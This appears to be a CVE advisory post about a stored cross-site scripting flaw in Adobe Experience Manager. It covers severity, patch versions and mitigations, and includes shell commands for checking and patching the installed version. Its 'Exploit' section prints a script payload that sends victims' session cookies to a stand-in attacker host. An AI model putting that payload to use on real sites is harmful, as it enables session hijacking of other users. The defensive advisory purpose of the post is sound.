Listen to this Post
CVE-2026-47975 is a stored Cross-Site Scripting (XSS) vulnerability affecting Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04, and all earlier releases. The flaw exists in how AEM handles user-supplied input within certain form fields. A low‑privileged attacker (e.g., a user with only content‑authoring rights) can inject malicious JavaScript code into a vulnerable form field. Because the application fails to properly neutralize the input before storing it, the injected script is persisted on the server side. When another user – typically a higher‑privileged user such as an administrator, reviewer, or any other victim – subsequently navigates to the page that contains that field, the malicious script is delivered to the victim’s browser and executed within the context of the AEM application domain. The vulnerability is classified as stored XSS (CWE‑79) because the payload becomes part of the permanent content of the web page.
The attack vector is network‑based, requiring low attack complexity and low privileges. However, user interaction is required: the victim must visit the affected page. The CVSS 3.1 score is 5.4 (Medium) with the vector string AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. The scope is changed, meaning the vulnerability allows the attacker to act outside the original vulnerable component’s boundaries. While the confidentiality and integrity impacts are low, an attacker can still perform actions such as stealing session cookies, performing unauthorised actions on behalf of the victim, or defacing content.
Adobe addressed the issue in the June 2026 security update (APSB26‑56) released on June 9, 2026. Users are advised to upgrade to AEM Cloud Service release 2026.05, AEM 6.5 LTS Service Pack 2, or AEM 6.5 Service Pack 25, depending on their deployment model. No exploits have been observed in the wild, but the existence of a public CVE record means that attackers may construct proof‑of‑concept code.
DailyCVE Form:
Platform: Adobe Experience Manager
Version: 6.5.24/LTS SP1/2026.04‑earlier
Vulnerability: Stored Cross‑Site Scripting
Severity: MEDIUM (CVSS 5.4)
Date: June 9, 2026
Prediction: Patch expected June 9, 2026
What Undercode Say:
Use the following bash commands to check your AEM version and apply the recommended patch:
Check current AEM version (from the CRX package manager) curl -u admin:admin 'http://localhost:4502/crx/packmgr/service.jsp?cmd=getVersion' Alternatively, inspect the release.properties file inside the AEM installation grep "currentVersion" /opt/aem/crx-quickstart/repository/version/release.properties Download and apply the official patch (example for AEM 6.5 SP25) wget https://experience.adobe.com/downloads/apsb26-56/6.5.25-sp.zip curl -u admin:admin -F [email protected] http://localhost:4502/crx/packmgr/service.jsp Restart the AEM instance after patch installation systemctl restart aem Verify patch installation curl -u admin:admin 'http://localhost:4502/crx/packmgr/service.jsp?cmd=ls' | grep -i "6.5.25"
Exploit:
A low‑privileged attacker can exploit the vulnerability by injecting a JavaScript payload into a vulnerable form field. For example:
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
If the application does not sanitise the input properly, the script will be stored and later executed in the browser of any user who views the affected page. The attacker can then capture session tokens, perform actions on behalf of the victim, or redirect to a malicious site.
Protection:
Upgrade immediately to AEM Cloud Service release 2026.05, AEM 6.5 LTS Service Pack 2, or AEM 6.5 Service Pack 25.
Apply a Web Application Firewall (WAF) with rules that block common XSS payloads (e.g., mod_security with Core Rule Set).
Enforce strict Content Security Policy (CSP) headers to restrict script execution to trusted sources.
Use output encoding for all user‑supplied data when rendering pages.
Limit low‑privileged users’ access to form fields that may contain dynamic content.
Monitor AEM access logs for suspicious inputs containing HTML tags or JavaScript keywords.
Impact:
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim’s browser. Potential impacts include:
Session hijacking – stealing authentication cookies and gaining unauthorised access.
Data exfiltration – reading sensitive information displayed on the page.
Phishing – modifying content to trick users into submitting credentials.
Defacement – altering the appearance or content of the AEM web page.
Escalation of privileges – performing actions as the victim user, possibly leading to full compromise of the AEM instance.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
